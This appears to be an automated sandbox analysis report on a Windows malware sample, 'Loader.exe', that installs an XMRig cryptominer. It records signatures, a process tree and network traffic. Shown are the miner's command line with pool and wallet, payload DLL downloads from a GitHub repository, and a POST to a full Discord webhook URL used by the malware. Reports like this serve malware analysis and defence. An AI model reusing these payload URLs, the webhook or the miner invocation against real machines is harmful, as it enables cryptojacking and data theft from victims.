Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03/02/2023, 18:48 UTC

General

  • Target

    Loader.exe

  • Size

    1.6MB

  • MD5

    a44e526804469076d712e8a05ddd7759

  • SHA1

    7010fda540e70139020a7a79730e74e99bd8e6c9

  • SHA256

    46d7128963bde013c8ec359b285e47eabbf9c88e332735e02ced518773e8e95f

  • SHA512

    04c40ef00c80d641c4f7bced8aefc180d695ea23ef79e272167f1a567484be2ab7031ca55a246cbeba1ed0c0ed93223fc2a33daed7f2048c62f169f0e6325b36

  • SSDEEP

    49152:fBvdZG5o8InNXL9Qn0HpZjI64n2hcyfT2:pFZG5oNnRfh9

Score
10/10

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4788
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAyAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2292
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RMHgF8iWWzutXCpbDgarftrSUoycmQgCqo.Worker_CPU -p x --cpu-max-threads-hint=50
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3776

Network

  • flag-us
    DNS
    ptb.discord.com
    Loader.exe
    Remote address:
    8.8.8.8:53
    Request
    ptb.discord.com
    IN A
    Response
    ptb.discord.com
    IN A
    162.159.136.232
    ptb.discord.com
    IN A
    162.159.137.232
    ptb.discord.com
    IN A
    162.159.135.232
    ptb.discord.com
    IN A
    162.159.128.233
    ptb.discord.com
    IN A
    162.159.138.232
  • flag-us
    DNS
    ptb.discord.com
    Loader.exe
    Remote address:
    8.8.8.8:53
    Request
    ptb.discord.com
    IN A
  • flag-us
    POST
    https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
    Loader.exe
    Remote address:
    162.159.136.232:443
    Request
    POST /api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: ptb.discord.com
    Content-Length: 202
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 204 No Content
    Date: Fri, 03 Feb 2023 18:50:04 GMT
    Content-Type: text/html; charset=utf-8
    Connection: keep-alive
    set-cookie: __dcfduid=92521944a3f311ed9de3aa7f43fb292e; Expires=Wed, 02-Feb-2028 18:50:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1675450205
    x-ratelimit-reset-after: 1
    Via: 1.1 google
    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pL7SQtDT7gH4Lb0C9uxZNWQFaMALfpkDcVAXFNrgeHpyCZa%2B5G4gvG59Y%2B6bB0VAFfpWEVJ1qeKI2yy%2BjAuKrg7639CrB%2FUHQ1%2Bb11SGLe9gPsnztOg1LmaN9naytI33yA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Set-Cookie: __sdcfduid=92521944a3f311ed9de3aa7f43fb292e270c2dbfbf6ee9493aac91798c4c7ecdc5e20c5d7c5ad9b19e4545be8f365585; Expires=Wed, 02-Feb-2028 18:50:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
    Set-Cookie: __cfruid=6105629be7006024db08d79af17898da8a1ce256-1675450204; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 793d59a16c001c9e-AMS
  • flag-us
    DNS
    14.110.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.110.152.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    github.com
    MSBuild.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    20.207.73.82
  • flag-in
    GET
    https://github.com/test93872/demo5/raw/main/plugin_3.dll
    MSBuild.exe
    Remote address:
    20.207.73.82:443
    Request
    GET /test93872/demo5/raw/main/plugin_3.dll HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Fri, 03 Feb 2023 18:49:31 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin: https://render.githubusercontent.com
    Location: https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C26F:2A6E:F06103:12E05B6:63DD5774
  • flag-in
    GET
    https://github.com/test93872/demo5/raw/main/plugin_4.dll
    MSBuild.exe
    Remote address:
    20.207.73.82:443
    Request
    GET /test93872/demo5/raw/main/plugin_4.dll HTTP/1.1
    Host: github.com
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Fri, 03 Feb 2023 18:48:51 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin: https://render.githubusercontent.com
    Location: https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Content-Length: 0
    X-GitHub-Request-Id: C26F:2A6E:F061B4:12E06B4:63DD5779
  • flag-us
    DNS
    raw.githubusercontent.com
    MSBuild.exe
    Remote address:
    8.8.8.8:53
    Request
    raw.githubusercontent.com
    IN A
    Response
    raw.githubusercontent.com
    IN A
    185.199.110.133
    raw.githubusercontent.com
    IN A
    185.199.111.133
    raw.githubusercontent.com
    IN A
    185.199.109.133
    raw.githubusercontent.com
    IN A
    185.199.108.133
  • flag-us
    GET
    https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll
    MSBuild.exe
    Remote address:
    185.199.110.133:443
    Request
    GET /test93872/demo5/main/plugin_3.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 2372653
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "988eccb86fa222930aee8203a6f29ad25b026c60ab99129b668cbd4e8ef39412"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: CE90:4761:21F1C:2A33A:63DD55A6
    Accept-Ranges: bytes
    Date: Fri, 03 Feb 2023 18:50:28 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ams21070-AMS
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1675450228.415971,VS0,VE22
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    X-Fastly-Request-ID: 6771c13d1164bdd7492733544a76933c96f29571
    Expires: Fri, 03 Feb 2023 18:55:28 GMT
    Source-Age: 102
  • flag-us
    GET
    https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
    MSBuild.exe
    Remote address:
    185.199.110.133:443
    Request
    GET /test93872/demo5/main/plugin_4.dll HTTP/1.1
    Host: raw.githubusercontent.com
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 37099
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "58a747ff1a171f0565a8909ab8adcac7763e62a5011998ec5b3daed1956393f9"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 692C:E376:E2DAAE:F21145:63DD55AC
    Accept-Ranges: bytes
    Date: Fri, 03 Feb 2023 18:50:33 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ams21070-AMS
    X-Cache: HIT
    X-Cache-Hits: 1
    X-Timer: S1675450234.878578,VS0,VE1
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    X-Fastly-Request-ID: f438c8fe8180c5f07c397cedf7e8c7bf52b59321
    Expires: Fri, 03 Feb 2023 18:55:33 GMT
    Source-Age: 102
  • flag-us
    DNS
    rx.unmineable.com
    AddInProcess.exe
    Remote address:
    8.8.8.8:53
    Request
    rx.unmineable.com
    IN A
    Response
    rx.unmineable.com
    IN CNAME
    rx.unminable.com
    rx.unminable.com
    IN CNAME
    rx-asia.unminable.com
    rx-asia.unminable.com
    IN CNAME
    rx-asia-sgp.unminable.com
    rx-asia-sgp.unminable.com
    IN A
    178.128.51.168
  • 20.224.254.73:443
    40 B
    1
  • 20.42.65.84:443
    322 B
    7
  • 162.159.136.232:443
    https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy
    tls, http
    Loader.exe
    1.2kB
    4.6kB
    9
    9

    HTTP Request

    POST https://ptb.discord.com/api/webhooks/1070807832355684404/_S6tQEFAEuvR3O7Nn3ucHe7XB3YMj_tAXnHLjti-fZbYupYsNNqHVYw8KPN8s3rT4luy

    HTTP Response

    204
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 163.123.142.203:44810
    MSBuild.exe
    442 B
    592 B
    7
    6
  • 20.207.73.82:443
    https://github.com/test93872/demo5/raw/main/plugin_4.dll
    tls, http
    MSBuild.exe
    981 B
    8.2kB
    11
    10

    HTTP Request

    GET https://github.com/test93872/demo5/raw/main/plugin_3.dll

    HTTP Response

    302

    HTTP Request

    GET https://github.com/test93872/demo5/raw/main/plugin_4.dll

    HTTP Response

    302
  • 185.199.110.133:443
    https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll
    tls, http
    MSBuild.exe
    51.5kB
    2.5MB
    1018
    1791

    HTTP Request

    GET https://raw.githubusercontent.com/test93872/demo5/main/plugin_3.dll

    HTTP Response

    200

    HTTP Request

    GET https://raw.githubusercontent.com/test93872/demo5/main/plugin_4.dll

    HTTP Response

    200
  • 93.184.221.240:80
    322 B
    7
  • 178.128.51.168:3333
    rx.unmineable.com
    AddInProcess.exe
    1.1kB
    2.0kB
    9
    8
  • 104.80.229.204:443
    322 B
    7
  • 8.8.8.8:53
    ptb.discord.com
    dns
    Loader.exe
    122 B
    141 B
    2
    1

    DNS Request

    ptb.discord.com

    DNS Request

    ptb.discord.com

    DNS Response

    162.159.136.232
    162.159.137.232
    162.159.135.232
    162.159.128.233
    162.159.138.232

  • 8.8.8.8:53
    14.110.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    14.110.152.52.in-addr.arpa

  • 8.8.8.8:53
    github.com
    dns
    MSBuild.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    20.207.73.82

  • 8.8.8.8:53
    raw.githubusercontent.com
    dns
    MSBuild.exe
    71 B
    135 B
    1
    1

    DNS Request

    raw.githubusercontent.com

    DNS Response

    185.199.110.133
    185.199.111.133
    185.199.109.133
    185.199.108.133

  • 8.8.8.8:53
    rx.unmineable.com
    dns
    AddInProcess.exe
    63 B
    154 B
    1
    1

    DNS Request

    rx.unmineable.com

    DNS Response

    178.128.51.168

MITRE ATT&CK Enterprise v6

Downloads

  • memory/2292-144-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2292-143-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2292-140-0x0000000000400000-0x000000000048C000-memory.dmp

    Filesize

    560KB

  • memory/3776-151-0x000001D7BC820000-0x000001D7BC860000-memory.dmp

    Filesize

    256KB

  • memory/3776-153-0x000001D7BC6F0000-0x000001D7BC710000-memory.dmp

    Filesize

    128KB

  • memory/3776-149-0x000001D7BC6A0000-0x000001D7BC6C0000-memory.dmp

    Filesize

    128KB

  • memory/3776-148-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-154-0x000001D7BC6F0000-0x000001D7BC710000-memory.dmp

    Filesize

    128KB

  • memory/3776-147-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-145-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-152-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/3776-150-0x0000000140000000-0x00000001407CA000-memory.dmp

    Filesize

    7.8MB

  • memory/4388-136-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4388-139-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4388-138-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-137-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-142-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-132-0x0000018696100000-0x00000186962A2000-memory.dmp

    Filesize

    1.6MB

  • memory/4788-134-0x00007FF83C920000-0x00007FF83D3E1000-memory.dmp

    Filesize

    10.8MB

  • memory/4788-133-0x0000018697EF0000-0x0000018697F12000-memory.dmp

    Filesize

    136KB